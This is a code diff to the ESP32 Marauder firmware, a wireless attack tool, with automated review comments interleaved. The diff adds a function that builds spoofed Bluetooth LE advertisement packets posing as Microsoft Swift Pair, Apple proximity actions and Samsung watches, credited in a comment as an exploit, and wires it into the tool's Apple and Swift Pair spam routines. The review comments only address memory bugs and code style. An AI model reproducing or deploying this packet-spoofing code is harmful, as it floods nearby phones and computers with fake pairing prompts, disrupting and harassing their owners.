diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp
index abbb234..8e9082b 100644
--- a/esp32_marauder/WiFiScan.cpp
+++ b/esp32_marauder/WiFiScan.cpp
@@ -27,6 +27,99 @@ extern "C" {
 //Exploit by ECTO-1A
 NimBLEAdvertising *pAdvertising;
+ //// Spooky
+ NimBLEAdvertisementData WiFiScan::GetUniversalAdvertisementData(EBLEPayloadType Type) {
+ NimBLEAdvertisementData AdvData = NimBLEAdvertisementData();
+
+ uint8_t* AdvData_Raw = nullptr;
+ uint8_t i = 0;
+
+ switch (Type) {
+ case Microsoft: {
+
+ const char* Name = this->generateRandomName();
+
+ uint8_t name_len = strlen(Name);
+
+ AdvData_Raw = new uint8_t[7 + name_len];
+
+ AdvData_Raw[i++] = 7 + name_len - 1;
+ AdvData_Raw[i++] = 0xFF;
+ AdvData_Raw[i++] = 0x06;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x03;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x80;
+ memcpy(&AdvData_Raw[i], Name, name_len);
+ i += name_len;
+
+ AdvData.addData(std::string((char *)AdvData_Raw, 7 + name_len));
+ break;
+ }
+ case Apple: {
+ AdvData_Raw = new uint8_t[17];
+
+ AdvData_Raw[i++] = 17 - 1; // Packet Length
+ AdvData_Raw[i++] = 0xFF; // Packet Type (Manufacturer Specific)
+ AdvData_Raw[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
+ AdvData_Raw[i++] = 0x00; // ...
+ AdvData_Raw[i++] = 0x0F; // Type
+ AdvData_Raw[i++] = 0x05; // Length
+ AdvData_Raw[i++] = 0xC1; // Action Flags
+ const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
+ AdvData_Raw[i++] = types[rand() % sizeof(types)]; // Action Type
+ esp_fill_random(&AdvData_Raw[i], 3); // Authentication Tag
+ i += 3;
+ AdvData_Raw[i++] = 0x00; // ???
+ AdvData_Raw[i++] = 0x00; // ???
+ AdvData_Raw[i++] = 0x10; // Type ???
+ esp_fill_random(&AdvData_Raw[i], 3);
+
+ AdvData.addData(std::string((char *)AdvData_Raw, 17));
+ break;
+ }
+ case Samsung: {
+
+ AdvData_Raw = new uint8_t[14];
+
+ uint8_t model = watch_models[rand() % 25].value;
+
+ AdvData_Raw[i++] = 14; // Size
+ AdvData_Raw[i++] = 0xFF; // AD Type (Manufacturer Specific)
+ AdvData_Raw[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
+ AdvData_Raw[i++] = 0x00; // ...
+ AdvData_Raw[i++] = 0x01;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x02;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x01;
+ AdvData_Raw[i++] = 0x01;
+ AdvData_Raw[i++] = 0xFF;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x00;
+ AdvData_Raw[i++] = 0x43;
+ AdvData_Raw[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?)
+
+ AdvData.addData(std::string((char *)AdvData_Raw, 14));
+ break;
+ }
+ case Google: {
+ // TODO Google
+ break;
+ }
+ default: {
+ Serial.println("Please Provide a Company Type");
+ break;
+ }
+ }
+
+ delete[] AdvData_Raw;
+
+ return AdvData;
+ }
+ //// Spooky
+
+ // Apple
 NimBLEAdvertisementData getOAdvertisementData() {
 NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
 uint8_t packet[17];
@@ -53,6 +146,7 @@ extern "C" {
 return randomAdvertisementData;
 }
+ // Microsoft
 NimBLEAdvertisementData getSwiftAdvertisementData() {
 extern WiFiScan wifi_scan_obj;
 NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
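Review bot: The Samsung branch writes 15 bytes into a 14-byte allocation — four `AdvData_Raw[i++]` stores before the line break and eleven after it (ten constants plus the `model` byte at index 14) — so `AdvData_Raw[i++] = (model >> 0x00) & 0xFF;` is a one-byte heap overflow on the ESP32, and the 14-byte `addData` then leaves the model byte out of the packet anyway. The length prefix `14` follows the size-minus-one convention of the Microsoft and Apple branches only for a 15-byte buffer, so the intended fix is `AdvData_Raw = new uint8_t[15];` and `AdvData.addData(std::string((char *)AdvData_Raw, 15));`. The raw `new[]` with a hand-counted length repeated in every branch is what let the two drift apart; a `std::vector<uint8_t>` filled with `push_back` and handed over as `std::string(buf.begin(), buf.end())` keeps the size and the contents in one place and drops the `delete[]` at the end. Also `watch_models[rand() % 25]` indexes a table that RunSetup fills with 26 entries, so the last model is never chosen; the bound should come from the table's size rather than a second literal.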
@@ -260,6 +354,35 @@ void WiFiScan::RunSetup() {
 access_points = new LinkedList();
 stations = new LinkedList();
+ watch_models = new WatchModel[26] {
+ {0x1A, "Fallback Watch"},
+ {0x01, "White Watch4 Classic 44m"},
+ {0x02, "Black Watch4 Classic 40m"},
+ {0x03, "White Watch4 Classic 40m"},
+ {0x04, "Black Watch4 44mm"},
+ {0x05, "Silver Watch4 44mm"},
+ {0x06, "Green Watch4 44mm"},
+ {0x07, "Black Watch4 40mm"},
+ {0x08, "White Watch4 40mm"},
+ {0x09, "Gold Watch4 40mm"},
+ {0x0A, "French Watch4"},
+ {0x0B, "French Watch4 Classic"},
+ {0x0C, "Fox Watch5 44mm"},
+ {0x11, "Black Watch5 44mm"},
+ {0x12, "Sapphire Watch5 44mm"},
+ {0x13, "Purpleish Watch5 40mm"},
+ {0x14, "Gold Watch5 40mm"},
+ {0x15, "Black Watch5 Pro 45mm"},
+ {0x16, "Gray Watch5 Pro 45mm"},
+ {0x17, "White Watch5 44mm"},
+ {0x18, "White & Black Watch5"},
+ {0x1B, "Black Watch6 Pink 40mm"},
+ {0x1C, "Gold Watch6 Gold 40mm"},
+ {0x1D, "Silver Watch6 Cyan 44mm"},
+ {0x1E, "Black Watch6 Classic 43m"},
+ {0x20, "Green Watch6 Classic 43m"},
+ };
+
 #ifdef HAS_BT
 NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
 NimBLEDevice::setScanDuplicateCacheSize(200);
@@ -1466,7 +1589,8 @@ void WiFiScan::executeSourApple() {
 pAdvertising = pServer->getAdvertising();
 delay(40);
- NimBLEAdvertisementData advertisementData = getOAdvertisementData();
+ //NimBLEAdvertisementData advertisementData = getOAdvertisementData();
+ NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Apple);
 pAdvertising->setAdvertisementData(advertisementData);
 pAdvertising->start();
 delay(20);
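Review bot: `watch_models = new WatchModel[26] { ... }` heap-allocates a constant table into a raw owning pointer that nothing in this diff ever deletes, so any repeated RunSetup call leaks the previous table, and a reader has to count the initializer to discover that the `rand() % 25` bound in GetUniversalAdvertisementData does not match the 26 entries. A file-scope `static const WatchModel kWatchModels[] = { ... };` in WiFiScan.cpp needs no allocation, is immutable, and lets the index bound be `sizeof(kWatchModels) / sizeof(kWatchModels[0])` instead of a second literal; `watch_models` can then point at it or go away entirely. RunSetup starts and ends outside the hunk, so whether it is guarded against being called more than once is not visible here.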
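Review bot: The replaced call is kept as a comment, `//NimBLEAdvertisementData advertisementData = getOAdvertisementData();`, directly above its replacement in executeSourApple, and the executeSwiftpairSpam hunk does the same with getSwiftAdvertisementData. Commented-out code should be removed rather than committed — version control keeps the history, and the `// Apple` / `// Microsoft` labels the commit adds above the old helpers already point a reader at them. If those helpers are now unused, consider deleting them too rather than keeping two generators for the same payload. Both executeSourApple and executeSwiftpairSpam start and end outside their hunks.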
@@ -1508,7 +1632,8 @@ void WiFiScan::executeSwiftpairSpam() {
 pAdvertising = pServer->getAdvertising();
- NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+ //NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+ NimBLEAdvertisementData advertisementData = this->GetUniversalAdvertisementData(Microsoft);
 pAdvertising->setAdvertisementData(advertisementData);
 pAdvertising->start();
 delay(10);
diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h
index a1dce57..3a9ead3 100644
--- a/esp32_marauder/WiFiScan.h
+++ b/esp32_marauder/WiFiScan.h
@@ -4,6 +4,7 @@
 #include "configs.h"
 #include
+#include
 #ifdef HAS_BT
 #include
@@ -298,7 +299,30 @@ class WiFiScan
 void RunEvilPortal(uint8_t scan_mode, uint16_t color);
 bool checkMem();
 #ifdef HAS_BT
+ enum EBLEPayloadType
+ {
+ Microsoft,
+ Apple,
+ Samsung,
+ Google
+ };
+
+ struct BLEData
+ {
+ NimBLEAdvertisementData AdvData;
+ NimBLEAdvertisementData ScanData;
+ };
+
+ struct WatchModel
+ {
+ uint8_t value;
+ const char *name;
+ };
+
+ WatchModel* watch_models = nullptr;
+ static void scanCompleteCB(BLEScanResults scanResults);
+ NimBLEAdvertisementData GetUniversalAdvertisementData(EBLEPayloadType type);
 #endif
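Review bot: `WatchModel* watch_models = nullptr;` is an owning raw pointer with no note on who allocates it, and GetUniversalAdvertisementData(Samsung) in WiFiScan.cpp indexes it without a null check, so at minimum it needs `// Owned. Allocated in RunSetup(); read by GetUniversalAdvertisementData(Samsung), which must not run before RunSetup().` — or, better, replace it with a const array so there is no ownership to document. `struct BLEData` is declared here but nothing in this diff reads or writes it; unless another change depends on it, drop it. `enum EBLEPayloadType` is an unscoped enum that puts `Microsoft`, `Apple`, `Samsung` and `Google` directly into the class scope; `enum class EBLEPayloadType` avoids name collisions at the cost of writing `EBLEPayloadType::Apple` at the two call sites in WiFiScan.cpp.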
@@ -373,5 +397,58 @@ class WiFiScan
 static void eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type);
 static void wifiSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type);
 static void addPacket(wifi_promiscuous_pkt_t *snifferPacket, int len);
+
+ /*#ifdef HAS_BT
+ enum EBLEPayloadType
+ {
+ Microsoft,
+ Apple,
+ Samsung,
+ Google
+ };
+
+ struct BLEData
+ {
+ NimBLEAdvertisementData AdvData;
+ NimBLEAdvertisementData ScanData;
+ };
+
+ struct WatchModel
+ {
+ uint8_t value;
+ const char *name;
+ };
+
+ WatchModel* watch_models = nullptr;
+
+ const WatchModel watch_models[] = {
+ {0x1A, "Fallback Watch"},
+ {0x01, "White Watch4 Classic 44m"},
+ {0x02, "Black Watch4 Classic 40m"},
+ {0x03, "White Watch4 Classic 40m"},
+ {0x04, "Black Watch4 44mm"},
+ {0x05, "Silver Watch4 44mm"},
+ {0x06, "Green Watch4 44mm"},
+ {0x07, "Black Watch4 40mm"},
+ {0x08, "White Watch4 40mm"},
+ {0x09, "Gold Watch4 40mm"},
+ {0x0A, "French Watch4"},
+ {0x0B, "French Watch4 Classic"},
+ {0x0C, "Fox Watch5 44mm"},
+ {0x11, "Black Watch5 44mm"},
+ {0x12, "Sapphire Watch5 44mm"},
+ {0x13, "Purpleish Watch5 40mm"},
+ {0x14, "Gold Watch5 40mm"},
+ {0x15, "Black Watch5 Pro 45mm"},
+ {0x16, "Gray Watch5 Pro 45mm"},
+ {0x17, "White Watch5 44mm"},
+ {0x18, "White & Black Watch5"},
+ {0x1B, "Black Watch6 Pink 40mm"},
+ {0x1C, "Gold Watch6 Gold 40mm"},
+ {0x1D, "Silver Watch6 Cyan 44mm"},
+ {0x1E, "Black Watch6 Classic 43m"},
+ {0x20, "Green Watch6 Classic 43m"},
+ };
+ #endif*/
 };
 #endif
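Review bot: A roughly 50-line commented-out copy of the class's own declarations, the `/*#ifdef HAS_BT ... #endif*/` block after addPacket, is committed here and will only drift from the live declarations in the @@ -298 hunk; delete it. If the point was to preserve the `const WatchModel watch_models[] = { ... };` form as a reference, that form is actually the better design (a constant table instead of the heap copy built in RunSetup), so move it to file scope in WiFiScan.cpp and use it rather than carrying both versions. The class body closes inside this hunk at `};`.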